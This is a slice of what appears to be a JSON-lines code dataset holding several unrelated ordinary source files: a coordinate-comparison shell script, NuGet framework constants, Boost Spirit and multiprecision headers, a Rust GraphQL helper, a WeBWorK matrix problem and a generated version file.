${OPTD_BEST_FILE_MISSING}\"\n\techo\nfi\n\n\n##\n# Compare the Geonames coordinates to the best known ones (until now).\n# It generates a data file (${POR_MAIN_DIFF}, e.g., optd_por_diff_w_geonames.csv)\n# containing the greatest distances (in km), for each airport/city, between\n# both sets of coordinates (Geonames and best known ones).\n${COMPARE_EXEC} ${GEONAME_FILE_SORTED_CUT} ${OPTD_BEST_WITH_NOHD} \\\n\t${AIRPORT_PR_FILE} ${COMP_MIN_DIST}\n# ${AIRPORT_PR_SORTED_CUT}\n\n\n##\n# Cleaning of temporary files\n#\nif [ \"${TMP_DIR}\" != \"/tmp/por/\" ]\nthen\n\t\\rm -f ${JOINED_COORD} ${JOINED_COORD_FULL}\n\t\\rm -f ${OPTD_BEST_FILE_HEADER}\n\t\\rm -f ${GEONAME_MASTER} ${OPTD_BEST_MASTER}\n\t\\rm -f ${GEONAME_FILE_SORTED} ${GEONAME_FILE_SORTED_CUT}\nfi\n"} {"text": "// Copyright (c) .NET Foundation. All rights reserved.\n// Licensed under the Apache License, Version 2.0. See License.txt in the project root for license information.\n\nusing System;\nusing System.Collections.Generic;\n\nnamespace NuGet.Frameworks\n{\n#if NUGET_FRAMEWORKS_INTERNAL\n internal\n#else\n public\n#endif\n static class FrameworkConstants\n {\n public static readonly Version EmptyVersion = new Version(0, 0, 0, 0);\n public static readonly Version MaxVersion = new Version(int.MaxValue, 0, 0, 0);\n public static readonly Version Version5 = new Version(5, 0, 0, 0);\n public static readonly Version Version10 = new Version(10, 0, 0, 0);\n public static readonly FrameworkRange DotNetAll = new FrameworkRange(\n new NuGetFramework(FrameworkIdentifiers.NetPlatform, FrameworkConstants.EmptyVersion),\n new NuGetFramework(FrameworkIdentifiers.NetPlatform, FrameworkConstants.MaxVersion));\n\n public static class SpecialIdentifiers\n {\n public const string Any = \"Any\";\n public const string Agnostic = \"Agnostic\";\n public const string Unsupported = \"Unsupported\";\n }\n\n public static class PlatformIdentifiers\n {\n public const string WindowsPhone = \"WindowsPhone\";\n public const string Windows = \"Windows\";\n }\n\n public static class FrameworkIdentifiers\n {\n public const string NetCoreApp = \".NETCoreApp\";\n public const string NetStandardApp = \".NETStandardApp\";\n public const string NetStandard = \".NETStandard\";\n public const string NetPlatform = \".NETPlatform\";\n public const string DotNet = \"dotnet\";\n public const string Net = \".NETFramework\";\n public const string NetCore = \".NETCore\";\n public const string WinRT = \"WinRT\"; // deprecated\n public const string NetMicro = \".NETMicroFramework\";\n public const string Portable = \".NETPortable\";\n public const string WindowsPhone = \"WindowsPhone\";\n public const string Windows = \"Windows\";\n public const string WindowsPhoneApp = \"WindowsPhoneApp\";\n public const string Dnx = \"DNX\";\n public const string DnxCore = \"DNXCore\";\n public const string AspNet = \"ASP.NET\";\n public const string AspNetCore = \"ASP.NETCore\";\n public const string Silverlight = \"Silverlight\";\n public const string Native = \"native\";\n public const string MonoAndroid = \"MonoAndroid\";\n public const string MonoTouch = \"MonoTouch\";\n public const string MonoMac = \"MonoMac\";\n public const string XamarinIOs = \"Xamarin.iOS\";\n public const string XamarinMac = \"Xamarin.Mac\";\n public const string XamarinPlayStation3 = \"Xamarin.PlayStation3\";\n public const string XamarinPlayStation4 = \"Xamarin.PlayStation4\";\n public const string XamarinPlayStationVita = \"Xamarin.PlayStationVita\";\n public const string XamarinWatchOS = \"Xamarin.WatchOS\";\n public const string XamarinTVOS = \"Xamarin.TVOS\";\n public const string XamarinXbox360 = \"Xamarin.Xbox360\";\n public const string XamarinXboxOne = \"Xamarin.XboxOne\";\n public const string UAP = \"UAP\";\n public const string Tizen = \"Tizen\";\n }\n\n /// \n /// Interned frameworks that are commonly used in NuGet\n /// \n public static class CommonFrameworks\n {\n public static readonly NuGetFramework Net11 = new NuGetFramework(FrameworkIdentifiers.Net, new Version(1, 1, 0, 0));\n public static readonly NuGetFramework Net2 = new NuGetFramework(FrameworkIdentifiers.Net, new Version(2, 0, 0, 0));\n public static readonly NuGetFramework Net35 = new NuGetFramework(FrameworkIdentifiers.Net, new Version(3, 5, 0, 0));\n public static readonly NuGetFramework Net4 = new NuGetFramework(FrameworkIdentifiers.Net, new Version(4, 0, 0, 0));\n public static readonly NuGetFramework Net403 = new NuGetFramework(FrameworkIdentifiers.Net, new Version(4, 0, 3, 0));\n public static readonly NuGetFramework Net45 = new NuGetFramework(FrameworkIdentifiers.Net, new Version(4, 5, 0, 0));\n public static readonly NuGetFramework Net451 = new NuGetFramework(FrameworkIdentifiers.Net, new Version(4, 5, 1, 0));\n public static readonly NuGetFramework Net452 = new NuGetFramework(FrameworkIdentifiers.Net, new Version(4, 5, 2, 0));\n public static readonly NuGetFramework Net46 = new NuGetFramework(FrameworkIdentifiers.Net, new Version(4, 6, 0, 0));\n public static readonly NuGetFramework Net461 = new NuGetFramework(FrameworkIdentifiers.Net, new Version(4, 6, 1, 0));\n public static readonly NuGetFramework Net462 = new NuGetFramework(FrameworkIdentifiers.Net, new Version(4, 6, 2, 0));\n public static readonly NuGetFramework Net463 = new NuGetFramework(FrameworkIdentifiers.Net, new Version(4, 6, 3, 0));\n\n public static readonly NuGetFramework NetCore45 = new NuGetFramework(FrameworkIdentifiers.NetCore, new Version(4, 5, 0, 0));\n public static readonly NuGetFramework NetCore451 = new NuGetFramework(FrameworkIdentifiers.NetCore, new Version(4, 5, 1, 0));\n public static readonly NuGetFramework NetCore50 = new NuGetFramework(FrameworkIdentifiers.NetCore, new Version(5, 0, 0, 0));\n\n public static readonly NuGetFramework Win8 = new NuGetFramework(FrameworkIdentifiers.Windows, new Version(8, 0, 0, 0));\n public static readonly NuGetFramework Win81 = new NuGetFramework(FrameworkIdentifiers.Windows, new Version(8, 1, 0, 0));\n public static readonly NuGetFramework Win10 = new NuGetFramework(FrameworkIdentifiers.Windows, new Version(10, 0, 0, 0));\n\n public static readonly NuGetFramework SL4 = new NuGetFramework(FrameworkIdentifiers.Silverlight, new Version(4, 0, 0, 0));\n public static readonly NuGetFramework SL5 = new NuGetFramework(FrameworkIdentifiers.Silverlight, new Version(5, 0, 0, 0));\n\n public static readonly NuGetFramework WP7 = new NuGetFramework(FrameworkIdentifiers.WindowsPhone, new Version(7, 0, 0, 0));\n public static readonly NuGetFramework WP75 = new NuGetFramework(FrameworkIdentifiers.WindowsPhone, new Version(7, 5, 0, 0));\n public static readonly NuGetFramework WP8 = new NuGetFramework(FrameworkIdentifiers.WindowsPhone, new Version(8, 0, 0, 0));\n public static readonly NuGetFramework WP81 = new NuGetFramework(FrameworkIdentifiers.WindowsPhone, new Version(8, 1, 0, 0));\n public static readonly NuGetFramework WPA81 = new NuGetFramework(FrameworkIdentifiers.WindowsPhoneApp, new Version(8, 1, 0, 0));\n\n public static readonly NuGetFramework Tizen3 = new NuGetFramework(FrameworkIdentifiers.Tizen, new Version(3, 0, 0, 0));\n public static readonly NuGetFramework Tizen4 = new NuGetFramework(FrameworkIdentifiers.Tizen, new Version(4, 0, 0, 0));\n public static readonly NuGetFramework Tizen6 = new NuGetFramework(FrameworkIdentifiers.Tizen, new Version(6, 0, 0, 0));\n\n public static readonly NuGetFramework AspNet = new NuGetFramework(FrameworkIdentifiers.AspNet, EmptyVersion);\n public static readonly NuGetFramework AspNetCore = new NuGetFramework(FrameworkIdentifiers.AspNetCore, EmptyVersion);\n public static readonly NuGetFramework AspNet50 = new NuGetFramework(FrameworkIdentifiers.AspNet, Version5);\n public static readonly NuGetFramework AspNetCore50 = new NuGetFramework(FrameworkIdentifiers.AspNetCore, Version5);\n\n public static readonly NuGetFramework Dnx = new NuGetFramework(FrameworkIdentifiers.Dnx, EmptyVersion);\n public static readonly NuGetFramework Dnx45 = new NuGetFramework(FrameworkIdentifiers.Dnx, new Version(4, 5, 0, 0));\n public static readonly NuGetFramework Dnx451 = new NuGetFramework(FrameworkIdentifiers.Dnx, new Version(4, 5, 1, 0));\n public static readonly NuGetFramework Dnx452 = new NuGetFramework(FrameworkIdentifiers.Dnx, new Version(4, 5, 2, 0));\n public static readonly NuGetFramework DnxCore = new NuGetFramework(FrameworkIdentifiers.DnxCore, EmptyVersion);\n public static readonly NuGetFramework DnxCore50 = new NuGetFramework(FrameworkIdentifiers.DnxCore, Version5);\n\n public static readonly NuGetFramework DotNet\n = new NuGetFramework(FrameworkIdentifiers.NetPlatform, EmptyVersion);\n public static readonly NuGetFramework DotNet50\n = new NuGetFramework(FrameworkIdentifiers.NetPlatform, Version5);\n public static readonly NuGetFramework DotNet51\n = new NuGetFramework(FrameworkIdentifiers.NetPlatform, new Version(5, 1, 0, 0));\n public static readonly NuGetFramework DotNet52\n = new NuGetFramework(FrameworkIdentifiers.NetPlatform, new Version(5, 2, 0, 0));\n public static readonly NuGetFramework DotNet53\n = new NuGetFramework(FrameworkIdentifiers.NetPlatform, new Version(5, 3, 0, 0));\n public static readonly NuGetFramework DotNet54\n = new NuGetFramework(FrameworkIdentifiers.NetPlatform, new Version(5, 4, 0, 0));\n public static readonly NuGetFramework DotNet55\n = new NuGetFramework(FrameworkIdentifiers.NetPlatform, new Version(5, 5, 0, 0));\n public static readonly NuGetFramework DotNet56\n = new NuGetFramework(FrameworkIdentifiers.NetPlatform, new Version(5, 6, 0, 0));\n\n public static readonly NuGetFramework NetStandard\n = new NuGetFramework(FrameworkIdentifiers.NetStandard, EmptyVersion);\n public static readonly NuGetFramework NetStandard10\n = new NuGetFramework(FrameworkIdentifiers.NetStandard, new Version(1, 0, 0, 0));\n public static readonly NuGetFramework NetStandard11\n = new NuGetFramework(FrameworkIdentifiers.NetStandard, new Version(1, 1, 0, 0));\n public static readonly NuGetFramework NetStandard12\n = new NuGetFramework(FrameworkIdentifiers.NetStandard, new Version(1, 2, 0, 0));\n public static readonly NuGetFramework NetStandard13\n = new NuGetFramework(FrameworkIdentifiers.NetStandard, new Version(1, 3, 0, 0));\n public static readonly NuGetFramework NetStandard14\n = new NuGetFramework(FrameworkIdentifiers.NetStandard, new Version(1, 4, 0, 0));\n public static readonly NuGetFramework NetStandard15\n = new NuGetFramework(FrameworkIdentifiers.NetStandard, new Version(1, 5, 0, 0));\n public static readonly NuGetFramework NetStandard16\n = new NuGetFramework(FrameworkIdentifiers.NetStandard, new Version(1, 6, 0, 0));\n public static readonly NuGetFramework NetStandard17\n = new NuGetFramework(FrameworkIdentifiers.NetStandard, new Version(1, 7, 0, 0));\n public static readonly NuGetFramework NetStandard20\n = new NuGetFramework(FrameworkIdentifiers.NetStandard, new Version(2, 0, 0, 0));\n public static readonly NuGetFramework NetStandard21\n = new NuGetFramework(FrameworkIdentifiers.NetStandard, new Version(2, 1, 0, 0));\n\n public static readonly NuGetFramework NetStandardApp15\n = new NuGetFramework(FrameworkIdentifiers.NetStandardApp, new Version(1, 5, 0, 0));\n\n public static readonly NuGetFramework UAP10\n = new NuGetFramework(FrameworkIdentifiers.UAP, Version10);\n\n public static readonly NuGetFramework NetCoreApp10\n = new NuGetFramework(FrameworkIdentifiers.NetCoreApp, new Version(1, 0, 0, 0));\n public static readonly NuGetFramework NetCoreApp11\n = new NuGetFramework(FrameworkIdentifiers.NetCoreApp, new Version(1, 1, 0, 0));\n public static readonly NuGetFramework NetCoreApp20\n = new NuGetFramework(FrameworkIdentifiers.NetCoreApp, new Version(2, 0, 0, 0));\n public static readonly NuGetFramework NetCoreApp21\n = new NuGetFramework(FrameworkIdentifiers.NetCoreApp, new Version(2, 1, 0, 0));\n public static readonly NuGetFramework NetCoreApp22\n = new NuGetFramework(FrameworkIdentifiers.NetCoreApp, new Version(2, 2, 0, 0));\n public static readonly NuGetFramework NetCoreApp30\n = new NuGetFramework(FrameworkIdentifiers.NetCoreApp, new Version(3, 0, 0, 0));\n public static readonly NuGetFramework NetCoreApp31\n = new NuGetFramework(FrameworkIdentifiers.NetCoreApp, new Version(3, 1, 0, 0));\n\n // .NET 5.0 and later has NetCoreApp identifier\n public static readonly NuGetFramework Net50 = new NuGetFramework(FrameworkIdentifiers.NetCoreApp, Version5);\n }\n }\n}\n"} {"text": "/*=============================================================================\n Copyright (c) 2001-2011 Joel de Guzman\n Copyright (c) 2001-2011 Hartmut Kaiser\n Copyright (c) 2011 Thomas Heller\n\n Distributed under the Boost Software License, Version 1.0. (See accompanying\n file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)\n==============================================================================*/\n#if !defined(BOOST_SPIRIT_CONTEXT_OCTOBER_31_2008_0654PM)\n#define BOOST_SPIRIT_CONTEXT_OCTOBER_31_2008_0654PM\n\n#if defined(_MSC_VER)\n#pragma once\n#endif\n\n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n\n///////////////////////////////////////////////////////////////////////////////\n#ifndef BOOST_SPIRIT_NO_PREDEFINED_TERMINALS\n\n#define SPIRIT_DECLARE_ATTRIBUTE(z, n, data) \\\n typedef phoenix::actor > \\\n BOOST_PP_CAT(BOOST_PP_CAT(_r, n), _type); \\\n phoenix::actor > const \\\n BOOST_PP_CAT(_r, n) = BOOST_PP_CAT(BOOST_PP_CAT(_r, n), _type)();\n /***/\n#define SPIRIT_USING_ATTRIBUTE(z, n, data) \\\n using spirit::BOOST_PP_CAT(BOOST_PP_CAT(_r, n), _type); \\\n using spirit::BOOST_PP_CAT(_r, n); \\\n /***/\n\n#else\n\n#define SPIRIT_DECLARE_ATTRIBUTE(z, n, data) \\\n typedef phoenix::actor > \\\n BOOST_PP_CAT(BOOST_PP_CAT(_r, n), _type); \\\n /***/\n#define SPIRIT_USING_ATTRIBUTE(z, n, data) \\\n using spirit::BOOST_PP_CAT(BOOST_PP_CAT(_r, n), _type); \\\n /***/\n\n#endif\n\nnamespace boost { namespace spirit\n{\n template \n struct attribute;\n\n template \n struct local_variable;\n}}\n\nBOOST_PHOENIX_DEFINE_CUSTOM_TERMINAL(\n template \n , boost::spirit::attribute\n , mpl::false_ // is not nullary\n , v2_eval(\n proto::make<\n boost::spirit::attribute()\n >\n , proto::call<\n functional::env(proto::_state)\n >\n )\n)\n\nBOOST_PHOENIX_DEFINE_CUSTOM_TERMINAL(\n template \n , boost::spirit::local_variable\n , mpl::false_ // is not nullary\n , v2_eval(\n proto::make<\n boost::spirit::local_variable()\n >\n , proto::call<\n functional::env(proto::_state)\n >\n )\n)\n\nnamespace boost { namespace spirit\n{\n template \n struct context\n {\n typedef Attributes attributes_type;\n typedef Locals locals_type;\n\n context(typename Attributes::car_type attribute)\n : attributes(attribute, fusion::nil()), locals() {}\n\n template \n context(\n typename Attributes::car_type attribute\n , Args const& args\n , Context& caller_context\n ) : attributes(\n attribute\n , fusion::as_list(\n fusion::transform(\n args\n , detail::expand_arg(caller_context)\n )\n )\n )\n , locals() {}\n\n context(Attributes const& attributes)\n : attributes(attributes), locals() {}\n\n Attributes attributes; // The attributes\n Locals locals; // Local variables\n };\n\n template \n struct attributes_of\n {\n typedef typename Context::attributes_type type;\n };\n\n template \n struct attributes_of\n {\n typedef typename Context::attributes_type const type;\n };\n\n template \n struct attributes_of\n : attributes_of\n {};\n\n template \n struct locals_of\n {\n typedef typename Context::locals_type type;\n };\n\n template \n struct locals_of\n {\n typedef typename Context::locals_type const type;\n };\n\n template \n struct locals_of\n {\n typedef typename Context::locals_type type;\n };\n\n template \n struct attribute\n {\n typedef mpl::true_ no_nullary;\n\n template \n struct result\n {\n typedef typename\n attributes_of::type\n >::type\n attributes_type;\n\n typedef typename\n fusion::result_of::size::type\n attributes_size;\n\n // report invalid argument not found (N is out of bounds)\n BOOST_SPIRIT_ASSERT_MSG(\n (N < attributes_size::value),\n index_is_out_of_bounds, ());\n\n typedef typename\n fusion::result_of::at_c::type\n type;\n };\n\n template \n typename result::type\n eval(Env const& env) const\n {\n return fusion::at_c((fusion::at_c<1>(env.args())).attributes);\n }\n };\n\n template \n struct local_variable\n {\n typedef mpl::true_ no_nullary;\n\n template \n struct result\n {\n typedef typename\n locals_of::type\n >::type\n locals_type;\n\n typedef typename\n fusion::result_of::size::type\n locals_size;\n\n // report invalid argument not found (N is out of bounds)\n BOOST_SPIRIT_ASSERT_MSG(\n (N < locals_size::value),\n index_is_out_of_bounds, ());\n\n typedef typename\n fusion::result_of::at_c::type\n type;\n };\n\n template \n typename result::type\n eval(Env const& env) const\n {\n return get_arg((fusion::at_c<1>(env.args())).locals);\n }\n };\n \n typedef phoenix::actor > _val_type;\n typedef phoenix::actor > _r0_type;\n typedef phoenix::actor > _r1_type;\n typedef phoenix::actor > _r2_type;\n\n#ifndef BOOST_SPIRIT_NO_PREDEFINED_TERMINALS\n // _val refers to the 'return' value of a rule (same as _r0)\n // _r1, _r2, ... refer to the rule arguments\n _val_type const _val = _val_type();\n _r0_type const _r0 = _r0_type();\n _r1_type const _r1 = _r1_type();\n _r2_type const _r2 = _r2_type();\n#endif\n\n // Bring in the rest of the attributes (_r4 .. _rN+1), using PP\n BOOST_PP_REPEAT_FROM_TO(\n 3, SPIRIT_ATTRIBUTES_LIMIT, SPIRIT_DECLARE_ATTRIBUTE, _)\n\n typedef phoenix::actor > _a_type;\n typedef phoenix::actor > _b_type;\n typedef phoenix::actor > _c_type;\n typedef phoenix::actor > _d_type;\n typedef phoenix::actor > _e_type;\n typedef phoenix::actor > _f_type;\n typedef phoenix::actor > _g_type;\n typedef phoenix::actor > _h_type;\n typedef phoenix::actor > _i_type;\n typedef phoenix::actor > _j_type;\n\n#ifndef BOOST_SPIRIT_NO_PREDEFINED_TERMINALS\n // _a, _b, ... refer to the local variables of a rule\n _a_type const _a = _a_type();\n _b_type const _b = _b_type();\n _c_type const _c = _c_type();\n _d_type const _d = _d_type();\n _e_type const _e = _e_type();\n _f_type const _f = _f_type();\n _g_type const _g = _g_type();\n _h_type const _h = _h_type();\n _i_type const _i = _i_type();\n _j_type const _j = _j_type();\n#endif\n\n // You can bring these in with the using directive\n // without worrying about bringing in too much.\n namespace labels\n {\n BOOST_PP_REPEAT(SPIRIT_ARGUMENTS_LIMIT, SPIRIT_USING_ARGUMENT, _)\n BOOST_PP_REPEAT(SPIRIT_ATTRIBUTES_LIMIT, SPIRIT_USING_ATTRIBUTE, _)\n\n#ifndef BOOST_SPIRIT_NO_PREDEFINED_TERMINALS\n using spirit::_val;\n using spirit::_a;\n using spirit::_b;\n using spirit::_c;\n using spirit::_d;\n using spirit::_e;\n using spirit::_f;\n using spirit::_g;\n using spirit::_h;\n using spirit::_i;\n using spirit::_j;\n#endif\n }\n}}\n\n#endif\n"} {"text": "/*\n * Copyright (c) Facebook, Inc. and its affiliates.\n *\n * This source code is licensed under the MIT license found in the\n * LICENSE file in the root directory of this source tree.\n */\n\nuse super::{read_to_string, WatchmanFile};\nuse crate::errors::{Error, Result};\nuse common::SourceLocationKey;\nuse graphql_syntax::GraphQLSource;\nuse std::{fs, path::Path};\nuse watchman_client::prelude::*;\n\n/// Reads and extracts `graphql` tagged literals from a file.\npub fn extract_graphql_strings_from_file(\n resolved_root: &ResolvedRoot,\n file: &WatchmanFile,\n) -> Result> {\n let contents = read_to_string(resolved_root, file)?;\n extract_graphql_strings_from_string(&contents)\n}\n\npub fn source_for_location(\n root_dir: &Path,\n source_location: SourceLocationKey,\n) -> Option {\n match source_location {\n SourceLocationKey::Embedded { path, index } => {\n let absolute_path = root_dir.join(path.lookup());\n let contents = fs::read_to_string(&absolute_path).ok()?;\n let file_sources = extract_graphql_strings_from_string(&contents).ok()?;\n file_sources.into_iter().nth(index)\n }\n SourceLocationKey::Standalone { path } => {\n let absolute_path = root_dir.join(path.lookup());\n Some(GraphQLSource {\n text: fs::read_to_string(&absolute_path).ok()?,\n line_index: 0,\n column_index: 0,\n })\n }\n SourceLocationKey::Generated => None,\n }\n}\n\n/// Reads and extracts `graphql` tagged literals from a string.\nfn extract_graphql_strings_from_string(contents: &str) -> Result> {\n extract_graphql::parse_chunks(&contents).map_err(|err| Error::Syntax { error: err })\n}\n"} {"text": "## DESCRIPTION\n## Linear Algebra\n## ENDDESCRIPTION\n\n## Tagged by tda2d\n\n## DBsubject(Linear algebra)\n## DBchapter(Matrices)\n## DBsection(Matrix algebra)\n## Date(July 2013)\n## Institution(TCNJ and Hope College)\n## Author(Paul Pearson)\n## MLT(matrix_mult)\n## Level(2)\n## MO(1)\n## TitleText1('Linear Algebra with Applications')\n## AuthorText1('Jeffrey Holt')\n## EditionText1('1')\n## Section1('3.2')\n## Problem1('')\n## KEYWORDS('matrix' 'product')\n\nDOCUMENT();\n\nloadMacros(\n \"PGstandard.pl\",\n \"MathObjects.pl\",\n \"PGcourse.pl\"\n);\n\nTEXT(beginproblem());\n$showPartialCorrectAnswers = 1;\n\nContext('Matrix');\n\n$A = Matrix([\n[non_zero_random(-9,9,1),non_zero_random(-9,9,1)],\n[non_zero_random(-9,9,1),non_zero_random(-9,9,1)],\n]);\n\n$B = Matrix([\n[non_zero_random(-9,9,1),non_zero_random(-9,9,1)],\n[non_zero_random(-9,9,1),non_zero_random(-9,9,1)],\n]);\n\n$B1 = $B->column(1);\n$B2 = $B->column(2);\n\n$ans[1] = $A * $B1;\n$ans[2] = $A * $B2;\n$ans[3] = $A * $B;\n\nContext()->texStrings;\nBEGIN_TEXT\nCompute the following products. \n$BR\n$BR\n\\( $A $B1 = \\) \\{ $ans[1]->ans_array(15) \\}\n$BR\n$BR\n\\( $A $B2 = \\) \\{ $ans[2]->ans_array(15) \\}\n$BR\n$BR\n\\( $A $B = \\) \\{ $ans[3]->ans_array(15) \\}\nEND_TEXT\nContext()->normalStrings;\n\nforeach my $i (1..3) {\nANS($ans[$i]->cmp);\n}\n;\nENDDOCUMENT();\n"} {"text": "#!/usr/bin/env python\n\"\"\"This file is automatically generated by generate_version_info\nIt uses the current working tree to determine the revision.\nSo don't edit it. :)\n\"\"\"\n\nversion_info = {'branch_nick': 'python-daemon.devel',\n 'build_date': '2009-05-22 19:50:06 +1000',\n 'clean': None,\n 'date': '2009-05-22 19:47:30 +1000',\n 'revision_id': 'ben+python@benfinney.id.au-20090522094730-p4vsa0reh7ktt4e1',\n 'revno': 145}\n\nrevisions = {}\n\nfile_revisions = {}\n\n\n\nif __name__ == '__main__':\n print('revision: %(revno)d' % version_info)\n print('nick: %(branch_nick)s' % version_info)\n print('revision id: %(revision_id)s' % version_info)\n"} {"text": "//////////////////3/////////////////////////////////////////////\r\n// Copyright 2012 John Maddock. Distributed under the Boost\r\n// Software License, Version 1.0. (See accompanying file\r\n// LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_\r\n\r\n#ifndef BOOST_MP_CPP_INT_HPP\r\n#define BOOST_MP_CPP_INT_HPP\r\n\r\n#include \r\n#include \r\n#include \r\n#include \r\n#include \r\n#include \r\n#include \r\n#include \r\n#include \r\n#include \r\n#include \r\n#include \r\n#include \r\n#include \r\n#include \r\n#include \r\n#ifdef BOOST_MP_USER_DEFINED_LITERALS\r\n#include \r\n#endif\r\n\r\nnamespace boost{\r\nnamespace multiprecision{\r\nnamespace backends{\r\n\r\n using boost::enable_if;\r\n\r\n\r\n#ifdef BOOST_MSVC\r\n#pragma warning(push)\r\n#pragma warning(disable:4307) // integral constant overflow (oveflow is in a branch not taken when it would overflow)\r\n#pragma warning(disable:4127) // conditional expression is constant\r\n#pragma warning(disable:4702) // Unreachable code (reachability depends on template params)\r\n#endif\r\n\r\ntemplate >::type >\r\nstruct cpp_int_backend;\r\n\r\n} // namespace backends\r\n\r\nnamespace detail {\r\n\r\n template \r\n struct is_byte_container > : public boost::false_type {};\r\n\r\n} // namespace detail\r\n\r\nnamespace backends{\r\n\r\ntemplate \r\nstruct cpp_int_base;\r\n//\r\n// Traits class determines the maximum and minimum precision values:\r\n//\r\ntemplate struct max_precision;\r\n\r\ntemplate \r\nstruct max_precision >\r\n{\r\n static const unsigned value = is_void::value ?\r\n static_unsigned_max::value\r\n : (((MaxBits >= MinBits) && MaxBits) ? MaxBits : UINT_MAX);\r\n};\r\n\r\ntemplate struct min_precision;\r\n\r\ntemplate \r\nstruct min_precision >\r\n{\r\n static const unsigned value = (is_void::value ? static_unsigned_max::value : MinBits);\r\n};\r\n//\r\n// Traits class determines whether the number of bits precision requested could fit in a native type,\r\n// we call this a \"trivial\" cpp_int:\r\n//\r\ntemplate \r\nstruct is_trivial_cpp_int\r\n{\r\n static const bool value = false;\r\n};\r\n\r\ntemplate \r\nstruct is_trivial_cpp_int >\r\n{\r\n typedef cpp_int_backend self;\r\n static const bool value = is_void::value && (max_precision::value <= (sizeof(double_limb_type) * CHAR_BIT) - (SignType == signed_packed ? 1 : 0));\r\n};\r\n\r\ntemplate \r\nstruct is_trivial_cpp_int >\r\n{\r\n static const bool value = true;\r\n};\r\n\r\n} // namespace backends\r\n//\r\n// Traits class to determine whether a cpp_int_backend is signed or not:\r\n//\r\ntemplate \r\nstruct is_unsigned_number >\r\n : public mpl::bool_<(SignType == unsigned_magnitude) || (SignType == unsigned_packed)>{};\r\n\r\nnamespace backends{\r\n//\r\n// Traits class determines whether T should be implicitly convertible to U, or\r\n// whether the constructor should be made explicit. The latter happens if we\r\n// are losing the sign, or have fewer digits precision in the target type:\r\n//\r\ntemplate \r\nstruct is_implicit_cpp_int_conversion;\r\n\r\ntemplate \r\nstruct is_implicit_cpp_int_conversion, cpp_int_backend >\r\n{\r\n typedef cpp_int_backend t1;\r\n typedef cpp_int_backend t2;\r\n static const bool value =\r\n (is_signed_number::value || !is_signed_number::value)\r\n && (max_precision::value <= max_precision::value);\r\n};\r\n\r\n//\r\n// Traits class to determine whether operations on a cpp_int may throw:\r\n//\r\ntemplate \r\nstruct is_non_throwing_cpp_int : public mpl::false_{};\r\ntemplate \r\nstruct is_non_throwing_cpp_int > : public mpl::true_ {};\r\n\r\n//\r\n// Traits class, determines whether the cpp_int is fixed precision or not:\r\n//\r\ntemplate \r\nstruct is_fixed_precision;\r\ntemplate \r\nstruct is_fixed_precision >\r\n : public mpl::bool_ >::value != UINT_MAX> {};\r\n\r\nnamespace detail{\r\n\r\ninline void verify_new_size(unsigned new_size, unsigned min_size, const mpl::int_&)\r\n{\r\n if(new_size < min_size)\r\n BOOST_THROW_EXCEPTION(std::overflow_error(\"Unable to allocate sufficient storage for the value of the result: value overflows the maximum allowable magnitude.\"));\r\n}\r\ninline void verify_new_size(unsigned /*new_size*/, unsigned /*min_size*/, const mpl::int_&){}\r\n\r\ntemplate \r\ninline void verify_limb_mask(bool b, U limb, U mask, const mpl::int_&)\r\n{\r\n // When we mask out \"limb\" with \"mask\", do we loose bits? If so it's an overflow error:\r\n if(b && (limb & ~mask))\r\n BOOST_THROW_EXCEPTION(std::overflow_error(\"Overflow in cpp_int arithmetic: there is insufficient precision in the target type to hold all of the bits of the result.\"));\r\n}\r\ntemplate \r\ninline void verify_limb_mask(bool /*b*/, U /*limb*/, U /*mask*/, const mpl::int_&){}\r\n\r\n}\r\n\r\n//\r\n// Now define the various data layouts that are possible as partial specializations of the base class,\r\n// starting with the default arbitrary precision signed integer type:\r\n//\r\ntemplate \r\nstruct cpp_int_base : private Allocator::template rebind::other\r\n{\r\n typedef typename Allocator::template rebind::other allocator_type;\r\n typedef typename allocator_type::pointer limb_pointer;\r\n typedef typename allocator_type::const_pointer const_limb_pointer;\r\n typedef mpl::int_ checked_type;\r\n\r\n //\r\n // Interface invariants:\r\n //\r\n BOOST_STATIC_ASSERT(!is_void::value);\r\n\r\nprivate:\r\n struct limb_data\r\n {\r\n unsigned capacity;\r\n limb_pointer data;\r\n };\r\n\r\npublic:\r\n BOOST_STATIC_CONSTANT(unsigned, limb_bits = sizeof(limb_type) * CHAR_BIT);\r\n BOOST_STATIC_CONSTANT(limb_type, max_limb_value = ~static_cast(0u));\r\n BOOST_STATIC_CONSTANT(limb_type, sign_bit_mask = static_cast(1u) << (limb_bits - 1));\r\n BOOST_STATIC_CONSTANT(unsigned, internal_limb_count =\r\n MinBits\r\n ? (MinBits / limb_bits + ((MinBits % limb_bits) ? 1 : 0))\r\n : (sizeof(limb_data) / sizeof(limb_type)));\r\n BOOST_STATIC_CONSTANT(bool, variable = true);\r\n\r\nprivate:\r\n union data_type\r\n {\r\n limb_data ld;\r\n limb_type la[internal_limb_count];\r\n limb_type first;\r\n double_limb_type double_first;\r\n\r\n BOOST_CONSTEXPR data_type() : first(0) {}\r\n BOOST_CONSTEXPR data_type(limb_type i) : first(i) {}\r\n BOOST_CONSTEXPR data_type(signed_limb_type i) : first(i < 0 ? static_cast(boost::multiprecision::detail::unsigned_abs(i)) : i) {}\r\n#ifdef BOOST_LITTLE_ENDIAN\r\n BOOST_CONSTEXPR data_type(double_limb_type i) : double_first(i) {}\r\n BOOST_CONSTEXPR data_type(signed_double_limb_type i) : double_first(i < 0 ? static_cast(boost::multiprecision::detail::unsigned_abs(i)) : i) {}\r\n#endif\r\n };\r\n\r\n data_type m_data;\r\n unsigned m_limbs;\r\n bool m_sign, m_internal;\r\n\r\npublic:\r\n //\r\n // Direct construction:\r\n //\r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR cpp_int_base(limb_type i)BOOST_NOEXCEPT\r\n : m_data(i), m_limbs(1), m_sign(false), m_internal(true) { }\r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR cpp_int_base(signed_limb_type i)BOOST_NOEXCEPT\r\n : m_data(i), m_limbs(1), m_sign(i < 0), m_internal(true) { }\r\n#if defined(BOOST_LITTLE_ENDIAN) && !defined(BOOST_MP_TEST_NO_LE)\r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR cpp_int_base(double_limb_type i)BOOST_NOEXCEPT\r\n : m_data(i), m_limbs(i > max_limb_value ? 2 : 1), m_sign(false), m_internal(true) { }\r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR cpp_int_base(signed_double_limb_type i)BOOST_NOEXCEPT\r\n 